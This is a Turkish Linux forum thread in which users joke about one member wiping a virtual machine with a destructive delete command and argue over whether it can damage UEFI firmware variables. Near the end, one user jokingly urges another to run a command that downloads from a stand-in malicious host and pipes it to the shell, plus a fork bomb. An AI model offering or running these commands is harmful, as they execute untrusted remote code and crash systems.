- Makaleler
- 1
@GNU or NOT 'a, Kobay Faremiz olduğu için teşekkür ediyoruz.
Benim için bir onur efendim.@GNU or NOT 'a, Kobay Faremiz olduğu için teşekkür ediyoruz.
Ben sanal sistemi silecektim, kuru kuru sileceğime biraz heyecan arayayım diyerek denemiştim.Bu komutu zorla uyguladıktan sonra sistemi geri nasıl çalıştırdınız? Tekrardan mı OS kurdunuz?
Hayati EFI değişkenlerinden kastınız EFI Boot yapılandırma dosyalarıysa eğer EFI bölümü ayrı bölüm olarak ayarlandıysa silinmez zaten ama boot edecek bir sistem olmadığı için silinse de silinmese de değişen bir şey olmayacak. BIOS ROM dosyalarıyla ilgili bir endişeniz olduysa o dosyalar da diske kaydedilmez ve işletim sistemleri ROM belleğe müdahale edemez. Anlatmak istediğiniz şeyle ilgili kaynak belirtirseniz iyi olur. Dağıtım değiştireceğim zamanlar /home dizinini yedekledikten sonra UEFI sistemimde her defasında bu komutla sonlandırıyorum ama bir sorun yaşamadım şimdiye kadar.Eğer EFI sisteminiz varsa ve EFI olarak kurduysanız sakın yapmayın!
Unified Extensible Firmware Interface - ArchWiki Şundan bahsediyordum. https://www.phoronix.com/scan.php?page=news_item&px=UEFI-rm-root-directoryHayati EFI değişkenlerinden kastınız EFI Boot yapılandırma dosyalarıysa eğer EFI bölümü ayrı bölüm olarak ayarlandıysa silinmez zaten ama boot edecek bir sistem olmadığı için silinse de silinmese de değişen bir şey olmayacak. BIOS ROM dosyalarıyla ilgili bir endişeniz olduysa o dosyalar da diske kaydedilmez ve işletim sistemleri ROM belleğe müdahale edemez. Anlatmak istediğiniz şeyle ilgili kaynak belirtirseniz iyi olur. Dağıtım değiştireceğim zamanlar /home dizinini yedekledikten sonra UEFI sistemimde her defasında bu komutla sonlandırıyorum ama bir sorun yaşamadım şimdiye kadar.
Tabii hemen deniyorum 15 dakika içinde cevap veremezsem sistem çökmüştür.@GNU or NOT bu komutu dener misin: wget http: // malicious_source -O | sh sonra bunu: : () {: |: &} ;: ikisinden birini seç ve dene![]()
Bu sitenin çalışmasını sağlamak için gerekli çerezleri ve deneyiminizi iyileştirmek için isteğe bağlı çerezleri kullanıyoruz.